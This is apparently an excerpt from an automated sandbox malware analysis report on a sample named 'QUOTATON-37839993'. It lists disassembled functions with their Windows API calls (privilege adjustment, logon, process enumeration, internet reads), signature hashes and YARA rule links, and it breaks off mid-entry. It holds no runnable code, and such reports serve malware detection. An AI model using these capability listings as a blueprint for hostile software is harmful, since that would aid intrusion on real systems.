                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04AD0), ref: 00E04B45
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E04B57
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      • Opcode ID: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
                                                                      • Instruction ID: 14eb25156c0239955aa11ae88cc7347d0cbe2539141eb4302ce67b77bdcf7c71
                                                                      • Opcode Fuzzy Hash: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
                                                                      • Instruction Fuzzy Hash: 0FD017B4A10B13CFD720AF32E928B0676E4AF45795B11983AD48EF6190E674E8C0CB54
                                                                      Function 00E7EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E7EE3D
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00E7EE4B
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00E7EF0B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E7EF1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                      • String ID:
                                                                      • API String ID: 2576544623-0
                                                                      • Opcode ID: 2d1c669f2cc8f9ff6ba847cc2a913d5f9f7760efd0cc060538640fbcda75f1e5
                                                                      • Instruction ID: 5940b931876251158b4681987b04865a5ad7e20c0f71ec4b0d20efc82db59308
                                                                      • Opcode Fuzzy Hash: 2d1c669f2cc8f9ff6ba847cc2a913d5f9f7760efd0cc060538640fbcda75f1e5
                                                                      • Instruction Fuzzy Hash: CE51A271504701AFD310EF20DC86E6BB7E8EF98710F50592DF595A72A2EB70E948CB92
                                                                      Function 00E5E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E5E628
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: 2ba6581e831e3b3f69e5454a1e134532f3eb427b9ac2fbee985cb257d8b93a7c
                                                                      • Instruction ID: cb0a725d7ea75cac03c23f9a596bee79619a369dc54dd1df49c75f24223f7a77
                                                                      • Opcode Fuzzy Hash: 2ba6581e831e3b3f69e5454a1e134532f3eb427b9ac2fbee985cb257d8b93a7c
                                                                      • Instruction Fuzzy Hash: 11322775A007059FD728CF29C4819AAB7F1FF48310B15D96EE89AEB3A1D770E941CB44
                                                                      Function 00E722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E7180A,00000000), ref: 00E723E1
                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E72418
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                      • String ID:
                                                                      • API String ID: 599397726-0
                                                                      • Opcode ID: 2fb56f448623b926d89d1945b9fe3d95be83021d77987ac6c70fa5b374de0d53
                                                                      • Instruction ID: 2d49e1a59a829b1b37dab41a80f357666d7d355273e78316376112f88cfed3a8
                                                                      • Opcode Fuzzy Hash: 2fb56f448623b926d89d1945b9fe3d95be83021d77987ac6c70fa5b374de0d53
                                                                      • Instruction Fuzzy Hash: 5441F57190420ABFEB20DE95DC81EBB77FCEB40318F10A06EF759B6241EB759E419650
                                                                      Function 00E6B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E6B40B
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E6B465
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E6B4B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: 63ff0e6bcec6eed41d47fc1ddd4d3da99003070b7191b413f9e70951f653e1a0
                                                                      • Instruction ID: d12c3c9f73388adc97181dff63b3b7c53efc4b534a4640154c168d5099d9b79b
                                                                      • Opcode Fuzzy Hash: 63ff0e6bcec6eed41d47fc1ddd4d3da99003070b7191b413f9e70951f653e1a0
                                                                      • Instruction Fuzzy Hash: 88213275A00118DFCB00EFA5D884AEDBBF8FF49314F1480A9E905EB352DB319955CB51
                                                                      Function 00E587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
                                                                        • Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5882B
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58858
                                                                      • GetLastError.KERNEL32 ref: 00E58865
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1922334811-0
                                                                      • Opcode ID: b7d38447860fcbc9e4e4bdd2873226bd926a6cf80e6f2472b11ff5dd2dce019b
                                                                      • Instruction ID: 376e9207734bde2194d3ca6fb6b36d8010e22876c5b63c00fa7380ffa8db9593
                                                                      • Opcode Fuzzy Hash: b7d38447860fcbc9e4e4bdd2873226bd926a6cf80e6f2472b11ff5dd2dce019b
                                                                      • Instruction Fuzzy Hash: A511BFB2404204AFE718DFA4ED85D6BB7F8EB04315B60952EF856A3251EB30BC448B60
                                                                      Function 00E5874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E58774
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E5878B
                                                                      • FreeSid.ADVAPI32(?), ref: 00E5879B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: ac0923996efa3c2838f2130a1b9ce1812a1902477a405bd3ea93fa9c21ae77a1
                                                                      • Instruction ID: f43f20f24058d4aa527577105c0689161f408363a07310f8ee931bc3de24e714
                                                                      • Opcode Fuzzy Hash: ac0923996efa3c2838f2130a1b9ce1812a1902477a405bd3ea93fa9c21ae77a1
                                                                      • Instruction Fuzzy Hash: 2EF03775A11308BFDB00DFE49D89AAEBBB8EF08201F1044A9E905E2181E6756A089B50
                                                                      Function 00E68889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __time64.LIBCMT ref: 00E6889B
                                                                        • Part of subcall function 00E2520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E68F6E,00000000,?,?,?,?,00E6911F,00000000,?), ref: 00E25213
                                                                        • Part of subcall function 00E2520A: __aulldiv.LIBCMT ref: 00E25233
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                      • String ID: 0e
                                                                      • API String ID: 2893107130-533242481
                                                                      • Opcode ID: 0f4e54ff9b82e6b8c6778b4349afedcaaae35e03c8a256d67305c0cbeb7e33e1
                                                                      • Instruction ID: 429b939a89a6b7b9b8296b7d62c8e6021a43521930828481d96b791280ef24aa
                                                                      • Opcode Fuzzy Hash: 0f4e54ff9b82e6b8c6778b4349afedcaaae35e03c8a256d67305c0cbeb7e33e1
                                                                      • Instruction Fuzzy Hash: 3C21AF326356108FC729CF29E841A52B3E1EBA5311B689F6CE0F5DB2D0CA75A909CB54
                                                                      Function 00E64C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E64CB3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: mouse_event
                                                                      • String ID: DOWN
                                                                      • API String ID: 2434400541-711622031
                                                                      • Opcode ID: 3b63c56a101e11022768fb8abdf34956ecb0895198d34094fe196f3447125e39
                                                                      • Instruction ID: f729362ce2e3f2dd68a7709a864a68286ad1764591fb2db372c86c44f8aa2267
                                                                      • Opcode Fuzzy Hash: 3b63c56a101e11022768fb8abdf34956ecb0895198d34094fe196f3447125e39
                                                                      • Instruction Fuzzy Hash: E5E046B22E97213CF9082A18BC02EFB02CC8B12375B21220AF814F51C2ED802C8225A8
                                                                      Function 00E6C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E6C6FB
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6C72B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 1b9671eeac4bde72a02e8b8eb009aa42b2ba0f54c7b26139aa1c5e0c2dd8597f
                                                                      • Instruction ID: 8d4c4d1c486ad380aba562e9253185eee862f76b973ad385d8ef530f4b4f388a
                                                                      • Opcode Fuzzy Hash: 1b9671eeac4bde72a02e8b8eb009aa42b2ba0f54c7b26139aa1c5e0c2dd8597f
                                                                      • Instruction Fuzzy Hash: EE1182716006009FDB10DF29D84592AF7E4EF85324F10C51EF8A9E7391DB30A805CB91
                                                                      Function 00E6A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E79468,?,00E8FB84,?), ref: 00E6A097
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E79468,?,00E8FB84,?), ref: 00E6A0A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: 6b183960610e91662c7885f4dbbd4410174326e8771da026a7372f819ff4f783
                                                                      • Instruction ID: 58772d43b1dc1fea1082bbf8f800e77dc076d06df5f2cffbebd64f293b1a1478
                                                                      • Opcode Fuzzy Hash: 6b183960610e91662c7885f4dbbd4410174326e8771da026a7372f819ff4f783
                                                                      • Instruction Fuzzy Hash: 52F0E23554422DABDB20AFA4DC48FEA776CBF083A1F004165F908F2181CA309944CBA1
                                                                      Function 00E581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58309), ref: 00E581E0
                                                                      • CloseHandle.KERNEL32(?,?,00E58309), ref: 00E581F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: 0f558d95040a46037d6d7d679e912dcb349b8b29f1a2cb1353f5152777072dc0
                                                                      • Instruction ID: 3ad5edba0b6b4157b1e5c2206112115f8a6e2bf2778e0e0f66ebe33fe90c9277
                                                                      • Opcode Fuzzy Hash: 0f558d95040a46037d6d7d679e912dcb349b8b29f1a2cb1353f5152777072dc0
                                                                      • Instruction Fuzzy Hash: B8E08C32000620AFEB212B61FC08D737BEAEF04311720982DF8AAE0471CB22AC90DB10
                                                                      Function 00E2A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E28D57,?,?,?,00000001), ref: 00E2A15A
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E2A163
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 6c4849efe7a0ff1c54eae10928979c07c512a46dc63bde4281134e2965fff092
                                                                      • Instruction ID: e5e96650a48eef351b6382d28677995d01af2e62a20109302c912e9c00a1526b
                                                                      • Opcode Fuzzy Hash: 6c4849efe7a0ff1c54eae10928979c07c512a46dc63bde4281134e2965fff092
                                                                      • Instruction Fuzzy Hash: 21B09231254308AFCA002B92EC09B883F68EB46AA2F404020F60D94060CB6254548B91
                                                                      Function 00E2F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 948773515dfefe471a8f46c89856d15cb35807f24706d5192141743c8be69132
                                                                      • Instruction ID: 2b3b1e7623b84cd5dab6c878d3a77201d816f266c5b857ca65f5a1a318f47171
                                                                      • Opcode Fuzzy Hash: 948773515dfefe471a8f46c89856d15cb35807f24706d5192141743c8be69132
                                                                      • Instruction Fuzzy Hash: 0F322522D29F114DD7279635D832335A299AFB73C8F15E737F81AB5AA5EB28C4C74100
                                                                      Function 00E3242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dff6ceaf32f0abedb99080420e9491856f31b4ec1517edebbfdc32b944a9a2f8
                                                                      • Instruction ID: db686e5db0e0fd49e0535164538e448f0634956c7a8edd785cc3e4530addb596
                                                                      • Opcode Fuzzy Hash: dff6ceaf32f0abedb99080420e9491856f31b4ec1517edebbfdc32b944a9a2f8
                                                                      • Instruction Fuzzy Hash: 50B10130D2AF404DD723963A8835336BA9CAFBB2C5F55D72BFC6674D22EB2185874181
                                                                      Function 00E587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E58389), ref: 00E587D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: LogonUser
                                                                      • String ID:
                                                                      • API String ID: 1244722697-0
                                                                      • Opcode ID: 0cabfa572a0816d57320f7ce2b6cd6c61a530b109ef0cf28cf78d2a62f2ad745
                                                                      • Instruction ID: b22122a9391a9f25a82b07e21fea019a4eb6cdc844089885969641a728972e80
                                                                      • Opcode Fuzzy Hash: 0cabfa572a0816d57320f7ce2b6cd6c61a530b109ef0cf28cf78d2a62f2ad745
                                                                      • Instruction Fuzzy Hash: 7CD09E3226450EAFEF019EA4DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60
                                                                      Function 00E2A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E2A12A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
